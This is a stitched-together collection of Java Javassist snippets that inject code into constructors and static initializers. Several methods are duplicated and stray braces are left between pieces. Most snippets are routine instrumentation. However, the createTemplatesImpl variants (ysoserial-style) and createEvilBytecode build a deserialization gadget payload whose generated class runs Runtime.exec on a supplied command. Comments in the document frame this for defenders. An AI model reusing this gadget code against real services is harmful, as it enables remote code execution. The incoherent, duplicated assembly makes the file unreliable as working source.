/**
 * Builds an instance of {@code tplClass} whose {@code _bytecodes} field holds a generated class
 * that calls {@code Runtime.exec} on {@code command} from its static initializer.
 *
 * <p>Security context: the original comments call this a "template gadget", i.e. the
 * payload-construction step of a Java deserialization gadget chain. Nothing in this method runs
 * the command; the generated initializer only runs once something defines and initializes the
 * embedded class. For defenders the root cause is native deserialization of untrusted data:
 * allow-list classes with {@code ObjectInputFilter} or avoid native serialization. The
 * {@code ysoserial.Pwner} class-name prefix and the {@code Pwnr} template name set below are
 * useful hunting strings, but they are plain constants, so their absence proves nothing.
 *
 * @param command command line embedded as a string literal in the generated {@code Runtime.exec}
 *     call, after two {@code replaceAll} passes (backslash doubling, then a double-quote
 *     replacement)
 * @param tplClass class that is instantiated with {@code newInstance()} and populated
 * @param abstTranslet class that becomes the superclass of the generated class
 * @param transFactory class instantiated with {@code newInstance()} for the {@code _tfactory}
 *     field
 * @return the populated {@code tplClass} instance
 * @throws Exception on any Javassist or reflection failure
 */
public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory ) throws Exception {
    final T templates = tplClass.newInstance();

    // Load the stub class that serves as the template for the generated class; both the stub and
    // the requested superclass must be resolvable through the pool.
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    pool.insertClassPath(new ClassClassPath(abstTranslet));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());

    // The command is compiled into the static initializer as Java source text.
    // Defender note: the initializer body is arbitrary Java, so a control that only watches for
    // process creation does not cover everything this primitive can do.
    String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + "\");";
    clazz.makeClassInitializer().insertAfter(cmd);

    // Unique name per call (nanoTime suffix) so repeated generation does not collide; the original
    // author warns that every distinct class costs PermGen space.
    clazz.setName("ysoserial.Pwner" + System.nanoTime());
    CtClass superC = pool.get(abstTranslet.getName());
    clazz.setSuperclass(superC);

    final byte[] classBytes = clazz.toBytecode();

    // Store the generated class plus the bytes of Foo in the private _bytecodes field.
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class) });

    // Per the original author, these two fields must also be set for TemplatesImpl to accept the
    // object.
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
    return templates;
}
/**
 * Appends an instance-counter log event to the end of the given constructor.
 *
 * <p>The injected statement is a fixed string, so no caller-supplied text is compiled here.
 *
 * @param clazz class that owns the constructor (not read by this method)
 * @param constructor constructor to instrument
 * @throws NotFoundException declared by the signature; not raised by the visible code
 * @throws CannotCompileException if Javassist cannot compile the injected statement
 */
private void addCounterIncrementer(CtClass clazz, CtConstructor constructor)
        throws NotFoundException, CannotCompileException {
    // Runs after the constructor body; "this" refers to the freshly built instance.
    constructor.insertAfter(
            "net.sf.jour.rt.agent.Elog.logEvent("
                    + "new net.sf.jour.rt.agent.InstanceCounterEvent(this.getClass(), true));");
}
/**
 * Patches the static initializer of {@code ctClass} so that it ends with a {@code setBridge(...)}
 * call receiving whatever {@code GwtTestGWTBridge.get()} returns.
 *
 * @param ctClass class whose static initializer is created if missing and then extended
 * @throws CannotCompileException if the injected statement does not compile
 */
@InitMethod
static void init(CtClass ctClass) throws CannotCompileException {
    // The injected source is built only from a class name known at compile time.
    String bridgeAccessor = GwtTestGWTBridge.class.getName() + ".get()";
    ctClass.makeClassInitializer().insertAfter("setBridge(" + bridgeAccessor + ");");
}
/**
 * Patches the static initializer of {@code ctClass} so that it ends with a {@code setBridge(...)}
 * call receiving whatever {@code GwtTestGWTBridge.get()} returns.
 *
 * @param ctClass class whose static initializer is created if missing and then extended
 * @throws CannotCompileException if the injected statement does not compile
 */
@InitMethod
static void init(CtClass ctClass) throws CannotCompileException {
    // The injected source is built only from a class name known at compile time.
    String bridgeAccessor = GwtTestGWTBridge.class.getName() + ".get()";
    ctClass.makeClassInitializer().insertAfter("setBridge(" + bridgeAccessor + ");");
}
/**
 * Makes every declared constructor of {@code clazz} report the new instance to
 * {@code GlobalNotificationBuildSupport.testInstanceCreated}.
 *
 * @param clazz class whose declared constructors are instrumented
 * @throws CannotCompileException if the injected call does not compile
 */
private void addConstructorNotification(final CtClass clazz) throws CannotCompileException {
    final String callback =
            GlobalNotificationBuildSupport.class.getName() + ".testInstanceCreated(this);";
    // The call is inserted "as finally" unless there is a super-class, because of this problem:
    // https://community.jboss.org/thread/94194
    final boolean runAsFinally = !hasSuperClass(clazz);
    final CtConstructor[] declared = clazz.getDeclaredConstructors();
    for (int i = 0; i < declared.length; i++) {
        declared[i].insertAfter(callback, runAsFinally);
    }
}
// Excerpt: instruments the class named by one configuration entry so that each new instance is
// handed to ConfigurationManager.manager.inject(this).
// NOTE(review): the class name is read from configuration, so whoever can edit that
// configuration chooses which classes get rewritten; confirm it is a trusted source.
Configuration conf = (Configuration) entry.getValue();
String clazz = conf.getClazz();
try {
    CtClass ctClass = ClassPool.getDefault().get(clazz);
    // Fixed statement appended to the end of every declared constructor.
    String appendCode = "{com.broada.bsp.gene.config.management.ConfigurationManager.manager.inject(this);\n}";
    CtConstructor constructor[] = ctClass.getDeclaredConstructors();
    for (CtConstructor ctConstructor : constructor) {
        ctConstructor.insertAfter(appendCode);
    }
    // Turns the modified CtClass into a loaded java.lang.Class; the excerpt ends here, with the
    // rest of the try block not shown.
    ctClass.toClass();
/**
 * Appends {@code setText("")} to the constructor of {@code c} that takes
 * {@code (Element, Renderer, Parser)}.
 *
 * @param c class whose three-argument constructor is patched
 * @throws CannotCompileException if the injected statement does not compile
 */
@InitMethod
static void initClass(CtClass c) throws CannotCompileException {
    // The injected statement is a constant; it runs after the original constructor body.
    JavassistUtils.findConstructor(c, Element.class, Renderer.class, Parser.class)
            .insertAfter("setText(\"\");");
}
/**
 * Appends {@code setText("")} to the constructor of {@code c} that takes
 * {@code (Element, Renderer, Parser)}.
 *
 * @param c class whose three-argument constructor is patched
 * @throws CannotCompileException if the injected statement does not compile
 */
@InitMethod
static void initClass(CtClass c) throws CannotCompileException {
    // The injected statement is a constant; it runs after the original constructor body.
    JavassistUtils.findConstructor(c, Element.class, Renderer.class, Parser.class)
            .insertAfter("setText(\"\");");
}
// Resolve the class that is going to be patched from the default pool.
ClassPool classPool = ClassPool.getDefault();
CtClass ctClass = classPool.get("package1.package2.ClassToInject");

// An empty parameter array selects the default (no-argument) constructor. For any other
// constructor, materialize one CtClass per parameter and pass them in this array instead.
CtConstructor noArgCtor = ctClass.getDeclaredConstructor(new CtClass[0]);

// The text handed to insertAfter() must be a regular, valid line of Java source. It is compiled
// into the class and becomes the last thing the constructor executes; here it reassigns Label1.
// Because this text is compiled as code, build it only from trusted values.
String injectedStatement =
        "Label1 = new package3.package4.Label(new StringBuilder().append(\"somePrefixMayBeAStringOrAVariableInScope\").append(user.name));";
noArgCtor.insertAfter(injectedStatement);

// Finally, write the modified bytecode below the given directory.
ctClass.writeFile("/somePathToPutTheInjectedClassFile/");
// Statement appended to ServiceFactory's no-arg constructor: it overwrites the "service" field
// with a MockServiceImpl. The text is built from a class literal only.
String setMockStatement = "service = new " + MockServiceImpl.class.getCanonicalName() + "();";

CtClass factoryClass = ClassPool.getDefault().getCtClass("ServiceFactory");
factoryClass.getDeclaredConstructor(null).insertAfter(setMockStatement);

// Load the patched class, then exercise it through the normal constructor.
factoryClass.toClass();
new ServiceFactory().getService().say();
/**
 * Returns the bytecode of a copy of {@code StubTransletPayload}, renamed to
 * {@code lightless.pwner}, whose static initializer calls {@code Runtime.exec} on
 * {@code command}.
 *
 * <p>Security context: this is payload construction for a deserialization-style gadget. The
 * method only produces bytes, and the command would run when some other code defines and
 * initializes the class. The fixed class name set below is a usable hunting string, but it is a
 * plain constant. The durable mitigation is not to deserialize or load untrusted class data.
 *
 * @param command command line embedded as a string literal in the generated call, after one
 *     double-quote {@code replaceAll} pass
 * @return bytecode of the generated class
 * @throws Exception on any Javassist failure
 */
static byte[] createEvilBytecode(final String command) throws Exception {
    // Get the ClassPool container and add the stub's class path to it
    ClassPool classPool = ClassPool.getDefault();
    classPool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    System.out.println("insert classpath: " + new ClassClassPath(StubTransletPayload.class));

    // Fetch the class
    System.out.println("ClassName: " + StubTransletPayload.class.getName());
    final CtClass clazz = classPool.get(StubTransletPayload.class.getName());

    // Insert the payload: the statement is compiled as Java source into the static initializer
    clazz.makeClassInitializer().insertAfter( "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") + "\");" );
    clazz.setName("lightless.pwner");

    // Get the bytecode
    final byte[] classBytes = clazz.toBytecode();
    return classBytes;
}
}
/**
 * Appends a call to the advisor's wrapper method at the end of {@code constructor}.
 *
 * <p>The generated statement has the form
 * {@code ((AdvisorType)<current advisor>).wrapperName(this[, $$]);}. The {@code $$} token, which
 * Javassist expands to all of the constructor's parameters, is added only when the constructor
 * has parameters.
 *
 * @param constructor constructor to instrument
 * @param wrapperName name of the advisor method to call; it is spliced into the generated
 *     source as-is
 * @throws NotFoundException if the constructor's parameter types cannot be resolved
 * @throws CannotCompileException if the generated statement does not compile
 */
private void insertWrapperCallInCtor(CtConstructor constructor, String wrapperName)
        throws NotFoundException, CannotCompileException {
    StringBuilder call = new StringBuilder("((");
    call.append(GeneratedAdvisorInstrumentor.getAdvisorFQN(constructor.getDeclaringClass()));
    call.append(")").append(GeneratedAdvisorInstrumentor.GET_CURRENT_ADVISOR).append(").");
    call.append(wrapperName).append("(this");
    if (constructor.getParameterTypes().length != 0) {
        call.append(", $$");
    }
    call.append(");");
    // asFinally is false, so the call is not inserted as a finally clause.
    constructor.insertAfter(call.toString(), false);
}
/**
 * Builds a {@code TemplatesImpl} whose {@code _bytecodes} field holds a generated class that
 * calls {@code Runtime.exec} on {@code command} from its static initializer.
 *
 * <p>Security context: the original comments call this a "template gadget", i.e. the
 * payload-construction step of a Java deserialization gadget chain. Nothing in this method runs
 * the command; the generated initializer only runs once something defines and initializes the
 * embedded class. For defenders the root cause is native deserialization of untrusted data:
 * allow-list classes with {@code ObjectInputFilter} or avoid native serialization. The
 * {@code ysoserial.Pwner} class-name prefix and the {@code Pwnr} template name set below are
 * useful hunting strings, but they are plain constants, so their absence proves nothing.
 *
 * @param command command line embedded as a string literal in the generated call, after one
 *     double-quote {@code replaceAll} pass
 * @return the populated {@code TemplatesImpl} instance
 * @throws Exception on any Javassist or reflection failure
 */
public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {
    final TemplatesImpl templates = new TemplatesImpl();

    // Load the stub class that serves as the template for the generated class.
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());

    // The command is compiled into the static initializer as Java source text.
    // Defender note: the initializer body is arbitrary Java, so a control that only watches for
    // process creation does not cover everything this primitive can do.
    clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");

    // Unique name per call (nanoTime suffix) so repeated generation does not collide; the original
    // author warns that every distinct class costs PermGen space.
    clazz.setName("ysoserial.Pwner" + System.nanoTime());

    final byte[] classBytes = clazz.toBytecode();

    // Store the generated class plus the bytes of Foo in the private _bytecodes field.
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class)});

    // Per the original author, these two fields must also be set for TemplatesImpl to accept the
    // object.
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
    return templates;
}
}
/**
 * Builds a {@code TemplatesImpl} whose {@code _bytecodes} field holds a generated class that
 * calls {@code Runtime.exec} on {@code command} from its static initializer.
 *
 * <p>Security context: the original comments call this a "template gadget", i.e. the
 * payload-construction step of a Java deserialization gadget chain. Nothing in this method runs
 * the command; the generated initializer only runs once something defines and initializes the
 * embedded class. For defenders the root cause is native deserialization of untrusted data:
 * allow-list classes with {@code ObjectInputFilter} or avoid native serialization. The
 * {@code ysoserial.Pwner} class-name prefix and the {@code Pwnr} template name set below are
 * useful hunting strings, but they are plain constants, so their absence proves nothing.
 *
 * @param command command line embedded as a string literal in the generated call, after one
 *     double-quote {@code replaceAll} pass
 * @return the populated {@code TemplatesImpl} instance
 * @throws Exception on any Javassist or reflection failure
 */
public static TemplatesImpl createTemplatesImpl(final String command) throws Exception {
    final TemplatesImpl templates = new TemplatesImpl();

    // Load the stub class that serves as the template for the generated class.
    ClassPool pool = ClassPool.getDefault();
    pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
    final CtClass clazz = pool.get(StubTransletPayload.class.getName());

    // The command is compiled into the static initializer as Java source text.
    // Defender note: the initializer body is arbitrary Java, so a control that only watches for
    // process creation does not cover everything this primitive can do.
    clazz.makeClassInitializer().insertAfter("java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\"", "\\\"") +"\");");

    // Unique name per call (nanoTime suffix) so repeated generation does not collide; the original
    // author warns that every distinct class costs PermGen space.
    clazz.setName("ysoserial.Pwner" + System.nanoTime());

    final byte[] classBytes = clazz.toBytecode();

    // Store the generated class plus the bytes of Foo in the private _bytecodes field.
    Reflections.setFieldValue(templates, "_bytecodes", new byte[][] { classBytes, ClassFiles.classAsBytes(Foo.class)});

    // Per the original author, these two fields must also be set for TemplatesImpl to accept the
    // object.
    Reflections.setFieldValue(templates, "_name", "Pwnr");
    Reflections.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
    return templates;
}
}
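/**
 * Instruments a constructor with its {@code @Post} check, if it has one.
 *
 * <p>A constructor carrying {@code @Pre} is rejected. The rejection message now names
 * {@code @Pre}, the annotation that is actually tested; it previously said {@code @Post}, which
 * is the annotation this method accepts.
 *
 * @param c constructor to inspect and possibly instrument
 * @return {@code true} if code was inserted, {@code false} if the constructor has no
 *     {@code @Post} annotation
 * @throws ClassNotFoundException if an annotation type cannot be loaded
 * @throws CannotCompileException if the constructor carries {@code @Pre}, or the generated check
 *     does not compile
 */
private boolean instrumentConstructor(CtConstructor c) throws ClassNotFoundException, CannotCompileException {
    Pre pre = (Pre) c.getAnnotation(Pre.class);
    if (pre != null) {
        throw new CannotCompileException(
                c.getLongName()
                        + " is a constructor may not be annotated with a @Pre annotation as any super() in the constructor must be called before injected chex.");
    }

    Post post = (Post) c.getAnnotation(Post.class);
    if (post == null) {
        return false;
    }

    // An empty annotation value falls back to a call to <name>$Post with all constructor
    // arguments ($$ is Javassist's shorthand for the full parameter list).
    String postValue = post.value().trim();
    if (postValue.isEmpty()) {
        postValue = c.getName() + "$Post($$)";
    }
    // NOTE(review): the annotation value and message are passed to createCode and the result is
    // compiled into the constructor, so only classes from a trusted build should be instrumented.
    c.insertAfter(this.createCode(postValue, post.message()));
    return true;
}
}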
/**
 * Terminates the statement built so far, appends it to the static initializer of {@code cc},
 * then resets the builder.
 *
 * @return this builder, cleared
 * @throws ObjectCompositionException if Javassist rejects the accumulated code; the message
 *     includes that code
 */
@Override
public CodeBuilder end() {
    try {
        semi();
        // The builder's text is compiled as Java source into the class initializer.
        cc.makeClassInitializer().insertAfter(toString());
    } catch (CannotCompileException e) {
        String detail = e.getMessage() + " for " + toString();
        throw new ObjectCompositionException(detail, e);
    }
    clear();
    return this;
}
};
/**
 * Terminates the statement built so far, appends it to the static initializer of {@code cc},
 * then resets the builder.
 *
 * @return this builder, cleared
 * @throws ObjectCompositionException if Javassist rejects the accumulated code; the message
 *     includes that code
 */
@Override
public CodeBuilder end() {
    try {
        semi();
        // The builder's text is compiled as Java source into the class initializer.
        cc.makeClassInitializer().insertAfter(toString());
    } catch (CannotCompileException e) {
        String detail = e.getMessage() + " for " + toString();
        throw new ObjectCompositionException(detail, e);
    }
    clear();
    return this;
}
};
/**
 * Adds {@code code} to the static initializer of the named class, creating the initializer when
 * the class does not have one yet.
 *
 * <p>{@code code} is compiled as Java source into the target class, so it must come from a
 * trusted caller. On failure the code text is also included in the exception message.
 *
 * @param fullClass name of the class to modify, resolved through {@code getClass(String)}
 * @param code Java source to run during class initialization
 */
public void addToClassInitializer(final String fullClass, final String code) {
    final CtClass classRef = getClass(fullClass);
    try {
        final CtConstructor existing = classRef.getClassInitializer();
        if (existing == null) {
            // No <clinit> yet: build a constructor from the code, then turn it into the static
            // initializer by renaming it and marking it static.
            final CtConstructor created =
                    CtNewConstructor.make(new CtClass[0], new CtClass[0], code, classRef);
            created.getMethodInfo().setName("<clinit>");
            created.setModifiers(Modifier.STATIC);
            classRef.addConstructor(created);
            return;
        }
        existing.insertAfter(code);
    } catch (final Throwable e) {
        // Any failure is wrapped and handed to maybeThrow, which decides whether to raise it.
        maybeThrow(new IllegalArgumentException("Cannot add " + code + " to class initializer of " + fullClass, e));
    }
}
/**
 * Adds {@code code} to the static initializer of the named class, creating the initializer when
 * the class does not have one yet.
 *
 * <p>{@code code} is compiled as Java source into the target class, so it must come from a
 * trusted caller. On failure the code text is also included in the exception message.
 *
 * @param fullClass name of the class to modify, resolved through {@code getClass(String)}
 * @param code Java source to run during class initialization
 */
public void addToClassInitializer(final String fullClass, final String code) {
    final CtClass classRef = getClass(fullClass);
    try {
        final CtConstructor existing = classRef.getClassInitializer();
        if (existing == null) {
            // No <clinit> yet: build a constructor from the code, then turn it into the static
            // initializer by renaming it and marking it static.
            final CtConstructor created =
                    CtNewConstructor.make(new CtClass[0], new CtClass[0], code, classRef);
            created.getMethodInfo().setName("<clinit>");
            created.setModifiers(Modifier.STATIC);
            classRef.addConstructor(created);
            return;
        }
        existing.insertAfter(code);
    } catch (final Throwable e) {
        // Any failure is wrapped and handed to maybeThrow, which decides whether to raise it.
        maybeThrow(new IllegalArgumentException("Cannot add " + code + " to class initializer of " + fullClass, e));
    }
}
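/**
 * Inserts {@code instrumentationInstruction} into the named class and returns the new bytecode.
 *
 * <p>The statement is appended to every constructor returned by {@code getConstructors()},
 * appended as a finally clause to every static method returned by {@code getMethods()}, and
 * prepended to the static initializer, which is created if missing.
 *
 * <p>{@code instrumentationInstruction} is compiled as Java source into the class, so it must
 * come from a trusted caller and never from external input.
 *
 * @param className name of the class to look up in the default {@code ClassPool}
 * @param instrumentationInstruction Java statement to insert
 * @return bytecode of the instrumented class
 * @throws CannotCompileException if the statement does not compile at an insertion point
 * @throws NotFoundException if the class cannot be found in the pool
 * @throws IOException if the bytecode cannot be produced
 */
public byte[] instrumentClassWithStaticStmt(String className, String instrumentationInstruction)
        throws CannotCompileException, NotFoundException, IOException {
    ClassPool pool = ClassPool.getDefault();
    CtClass clazz = pool.get(className);
    // The pool may hand back a class that was already frozen by an earlier toBytecode() call.
    clazz.defrost();

    for (CtConstructor ctConstructor : clazz.getConstructors()) {
        ctConstructor.insertAfter(instrumentationInstruction);
    }

    // Iterate the array fetched here instead of calling getMethods() a second time.
    CtMethod[] methods = clazz.getMethods();
    if (methods != null) {
        for (CtMethod ctMethod : methods) {
            if (Modifier.isStatic(ctMethod.getModifiers())) {
                // asFinally = true: the statement is inserted as a finally clause.
                ctMethod.insertAfter(instrumentationInstruction, true);
            }
        }
    }

    CtConstructor constructor = clazz.makeClassInitializer();
    constructor.insertBefore(instrumentationInstruction);
    clazz.defrost();
    return clazz.toBytecode();
}
}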